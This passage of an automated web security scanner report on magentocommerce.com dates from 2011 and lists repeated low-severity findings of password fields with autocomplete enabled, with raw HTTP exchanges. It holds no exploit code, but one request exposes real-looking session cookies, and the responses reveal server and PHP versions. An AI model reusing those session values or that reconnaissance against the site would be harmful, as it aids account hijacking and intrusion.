Set-Cookie: exp_last_activity=1313175743; expires=Sat, 11-Aug-2012 15:02:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fproduct%2Fmagento-zend%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:23 GMT
Content-Length: 34344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.124. http://www.magentocommerce.com/product/mobile  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/mobile

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/mobile HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175711; expires=Sat, 11-Aug-2012 15:01:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fproduct%2Fmobile%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:52 GMT
Content-Length: 108871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.125. http://www.magentocommerce.com/product/professional-edition  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/professional-edition

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/professional-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175663; expires=Sat, 11-Aug-2012 15:01:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproduct%2Fprofessional-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:03 GMT
Content-Length: 40267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.126. http://www.magentocommerce.com/products/checkout/cart/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/checkout/cart/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:50 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Content-Length: 23027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Shopping
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form action="https://www.magentocommerce.com/products/customer/account/loginPost/" method="post">
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout/cart/" />
...[SNIP]...
</label>
<input type="password" name="login[password]" id="password" class="input-topbg" style="width:142px;" /></p>
...[SNIP]...
5.127. http://www.magentocommerce.com/products/job-post.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/job-post.html HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:58 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Content-Length: 31391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Job Post
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form action="https://www.magentocommerce.com/products/customer/account/loginPost/" method="post">
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/job-post.html" />
...[SNIP]...
</label>
<input type="password" name="login[password]" id="password" class="input-topbg" style="width:142px;" /></p>
...[SNIP]...
5.128. http://www.magentocommerce.com/pt_BR  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pt_BR

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pt_BR HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fpt_BR%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:27 GMT
Content-Length: 109441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.129. http://www.magentocommerce.com/roadmap/issue-roadmap  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap/issue-roadmap

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /roadmap/issue-roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176444; expires=Sat, 11-Aug-2012 15:14:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Froadmap%2Fissue-roadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 34644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.130. http://www.magentocommerce.com/ru  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.131. http://www.magentocommerce.com/services  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.132. http://www.magentocommerce.com/services/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:12 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.133. http://www.magentocommerce.com/services/course-pricing  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-pricing

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/course-pricing HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175747; expires=Sat, 11-Aug-2012 15:02:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fservices%2Fcourse-pricing%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:27 GMT
Content-Length: 35078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.134. http://www.magentocommerce.com/services/course-schedule  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-schedule

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/course-schedule HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175751; expires=Sat, 11-Aug-2012 15:02:31 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fservices%2Fcourse-schedule%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:31 GMT
Content-Length: 49762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.135. http://www.magentocommerce.com/services/descriptions  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/descriptions

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/descriptions HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/training
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170926; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.6.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171049; expires=Sat, 11-Aug-2012 13:44:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:09 GMT
Content-Length: 57276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.136. http://www.magentocommerce.com/services/professional-services  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/professional-services

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/professional-services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175764; expires=Sat, 11-Aug-2012 15:02:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fprofessional-services%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:45 GMT
Content-Length: 35091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.137. http://www.magentocommerce.com/services/register-for-training  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/register-for-training

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/register-for-training HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
